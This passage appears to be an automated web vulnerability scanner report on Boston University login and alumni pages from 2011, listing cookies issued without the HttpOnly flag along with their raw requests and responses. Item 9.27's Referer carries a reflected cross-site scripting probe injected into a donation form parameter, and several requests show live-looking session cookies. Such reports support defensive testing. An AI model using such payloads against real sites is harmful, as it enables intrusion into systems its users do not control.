Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.21.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:06:23 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycnwrxHDsAAAJizks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:06:23 GMT
X-BU-Main-Uniqueid: ToycnwrxHDsAAGaXUrcAAAAm
X-BU-Duration: D=73727061
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

9.17. https://weblogin.bu.edu/weblogin/webnew/bu-filler-head.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/bu-filler-head.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/bu-filler-head.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Apr 2004 19:06:24 GMT
ETag: "4211040100b7-26f-3d8845fc28c00"
Accept-Ranges: bytes
Content-Length: 623
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhgGggAAAAo
X-BU-Duration: D=9614
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a...................!.......,.............................H....*.....1...-....7...........Ia..\:....Z.^.....g.c...E...6..v......W.........xG.'.X8..x..h...H.h)    9y..Y........:*j.........z:.*[..K..
...[SNIP]...

9.18. https://weblogin.bu.edu/weblogin/webnew/bu-filler.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/bu-filler.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/bu-filler.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Apr 2004 20:06:24 GMT
ETag: "4212040100b7-a6-3d88536563000"
Accept-Ranges: bytes
Content-Length: 166
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhPgAIAAAAd
X-BU-Duration: D=9603
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a.............!.......,..........}..................H...........L..........
.....L*....    .J......j............N....................(8HXhx..........)9IYiy....T..;

9.19. https://weblogin.bu.edu/weblogin/webnew/footer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/footer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/footer.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:22:51 GMT
ETag: "63b1040100b7-3af-476611ca010c0"
Accept-Ranges: bytes
Content-Length: 943
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhuN6IAAAAz
X-BU-Duration: D=9357
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a..=................!.......,......=......................H.....j    ....L..........    .....L*..R.    .J......=.........-..N...6........
.........8HXhx.&.........9IYiyI!.....9..):JZ..j....:..
.+;K.J{....
...[SNIP]...

9.20. https://weblogin.bu.edu/weblogin/webnew/main-title.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/main-title.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/main-title.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:23:08 GMT
ETag: "63b3040100b7-b44-476611da37700"
Accept-Ranges: bytes
Content-Length: 2884
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFiBZTEAAABF
X-BU-Duration: D=10317
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a|...........................fffDDD.........@@@.........UUU...""".@@......```...www......PPP000... 333ppp................. ....00.``....BD.pp..........fd.PP.............FD.vt."$.VT.......
...[SNIP]...

9.21. https://weblogin.bu.edu/weblogin/webnew/sub_title.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/sub_title.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/sub_title.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:23:18 GMT
ETag: "63b4040100b7-a34-476611e3c0d80"
Accept-Ranges: bytes
Content-Length: 2612
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhdEfAAAAAl
X-BU-Duration: D=9262
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a|...........................fffDDD.........@@@.........UUU...""".@@......```...www......PPP000... 333ppp................. ....00.``....BD.pp..........fd.PP.............FD.vt."$.VT.......
...[SNIP]...

9.22. https://weblogin.bu.edu/webnew/alumnew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:25 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToycZQrxHDsAAFwVZ3oAAAAS
X-BU-Duration: D=16292141
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 29113


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_ddmenu_sidenav.dwt" codeOutsideHTMLIsLocked=
...[SNIP]...

9.23. https://www.bu.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:15 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Accept-Ranges: bytes
X-BU-Main-Uniqueid: ToyiNwrxHDYAAGKAtakAAABD
X-BU-Duration: D=7079
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...

9.24. https://www.bu.edu/alumni-forms/forms/annualfund/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/annualfund/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/annualfund/index.html HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 23 Feb 2011 16:23:26 GMT
ETag: "1bd4002400001234-e39a-49cf584379bbe"
Accept-Ranges: bytes
Content-Length: 58266
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGUNv00AAAMX
X-BU-Duration: D=13739
X-BU-Backend: content_default (null)
Content-Type: text/html
Via: 1.1 www.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

9.25. https://www.bu.edu/alumni-forms/forms/ath/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/ath/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/ath/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Mar 2011 20:35:24 GMT
ETag: "1bd4014400001234-1423b-49fb91dc41b58"
Accept-Ranges: bytes
Content-Length: 82491
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGVNx3UAAAOV
X-BU-Duration: D=19114
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equi
...[SNIP]...

9.26. https://www.bu.edu/alumni-forms/forms/giving/online/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/giving/online/index/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/giving/online/index/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Tue, 24 May 2011 14:44:12 GMT
ETag: "1bd400b200001234-e4a5-4a4069f0c8744"
Accept-Ranges: bytes
Content-Length: 58533
X-BU-Main-Uniqueid: ToybaQrxHDYAAEndiNsAAAWQ
X-BU-Duration: D=12581
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

9.27. https://www.bu.edu/alumni-forms/images/happygroup.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/images/happygroup.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alumni-forms/images/happygroup.jpg HTTP/1.1
Host: www.bu.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.bu.edu/phpbin/telegraph/?form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&phone=&email=&school=n%2Fa&year=&caller=&amount_other=&matching=&number_of_months=%23+of&designation=&fund_other=2850d%3Cscript%3Ealert(document.location)%3C/script%3Ef93343ad016b277d2&comments=&submit2=Make+Your+Gift
Cookie: isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:10:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Set-Cookie: wantsMobile=false_1.2_default; path=/; domain=.bu.edu
Last-Modified: Thu, 29 Jul 2010 20:01:45 GMT
ETag: "1bd4022600001234-64b4-48c8c34251c47"
Accept-Ranges: bytes
Content-Length: 25780
X-BU-Main-Uniqueid: ToydfwrxHD4AAAmrTiIAAAAM
X-BU-Duration: D=10064
X-BU-Backend: content_default (null)
Content-Type: image/jpeg
Via: 1.1 www.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...

9.28. https://www.bu.edu/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:02 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:21:08 GMT
Accept-Ranges: bytes
Content-Length: 19106
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:36:02 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiZgrxHDYAAGUNv1QAAAMR
X-BU-Duration: D=12731
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

9.29. https://www.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Jan 2008 00:16:42 GMT
ETag: "1bf308d800001234-13e-444e574a4ce83"
Accept-Ranges: bytes
Content-Length: 318
X-BU-Main-Uniqueid: ToybDgrxHDYAAEaPWxgAAATW
X-BU-Duration: D=5560
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............(.......(....... .......................................``..ff..................................................wwwwwwwwwwwwwwww.........................Ww07w0...0qt.p...0pr.p...v0r.p...
...[SNIP]...

9.30. https://www.bu.edu/help/tech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/tech/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Mon, 02 Aug 2010 15:28:10 GMT
ETag: "1420053200001234-2ea2-48cd8d9199681"
Accept-Ranges: bytes
Content-Length: 11938
X-BU-Main-Uniqueid: ToyiTwrxHDYAAGJVrjsAAAHQ
X-BU-Duration: D=9453
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

9.31. https://www.bu.edu/help/tech/qa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/qa/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/tech/qa/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:40 GMT
